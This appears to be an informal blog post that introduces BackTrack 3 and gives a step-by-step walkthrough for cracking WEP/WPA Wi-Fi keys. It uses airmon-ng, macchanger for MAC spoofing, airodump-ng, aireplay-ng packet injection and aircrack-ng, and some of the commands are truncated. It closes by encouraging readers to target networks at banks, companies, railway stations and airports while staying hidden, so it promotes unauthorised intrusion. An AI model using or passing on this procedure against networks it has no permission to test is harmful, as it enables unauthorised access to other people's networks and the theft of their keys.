Hi,
This session i am going to talk about the mother-of-all-hacks :)
Actually the backtrack linux distribution has come into existence because of "AUDITOR" & "WHAX". These two are of linux distributions but for only one purpose that is for live penetration testing. Which means it is used to check whether an computer or network is safe under malicious attack thus by creating simulated attacks.
Backtrack is simply the combination of those two distributions. So if you check for one stop OS to learn or hacking remote system then backtrack is for you....
You can live boot from USB stick or CD or from hard drive as your wish...but USB is more than enough for cracking WIFI network keys. yes today im going to talk about this part in detail....
CRACK WEP/WPA key with Backtrack 3:
You can find backtrack distros in this link: http://www.remote-exploit.org/backtrack_download.html .The official site for backtrack, version 4 beta has been released. But im going to download Back track 3 (USB version extended) .ISO file. It may take 4-5 hrs @ 54 MBPS speed, after downloaded extract the ISO file with the help of WINRAR, you will find two folders named "BOOT" & "BT3". Now format your USB drive and then copy those two folders alone...
After copied open command prompt in windows type the USB drive letter (for example f:) then press enter. then type the following..
prompt>cd BOOT
prompt\boot>bootinst.bat then press enter...
Now Reeboot your computer while rebooting goto bios setup change boot from harddrive to boot from USB. Now backtrack get's loaded from USB drive....
Make sure you have built in WIFI adapter or you have to buy external USB WIFI adapter for your system....
After Backtrack desktop get loaded open terminal window (just like command prompt in windows) then open two more terminal windows... with three terminal shell opened type the followings....from now on i name those three shell window as shell1, shell2 & shell3...
open first terminal shell window i.e. Shell1 and type the following...
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
check for monitor mode enabled...
airodump-ng wlan0
program runs...after that it shows list of secured or unsecured wifi networks along with name,bssid,essid,channel number etc...choose the one you want....and proceed further...
airodump-ng -c
program runs in SHELL 1...Which actually monitors the status of the program...
open another shell i.e SHELL 2....n enter the following command
aireplay-ng -1 0 -a
program runs in 2nd shell
after getting association successful message...type the following in SHELL 2..
aireplay-ng -3 -b
program runs to get connect to your target network...
open 3rd shell n type...
aircrack-ng wep-01.cap
Brute force combination program runs untill decrypt correctly so wait...
you will get a cracked key in a minute... Happy hacking...:)
NOTE: Make sure you are in safe place...and stay near WIFI hotspots such as bank, MNC's, railway stations or airports.....etc...it doesn't matter whether your target network is secured or unsecured....
Remember every system has a "FLAW".........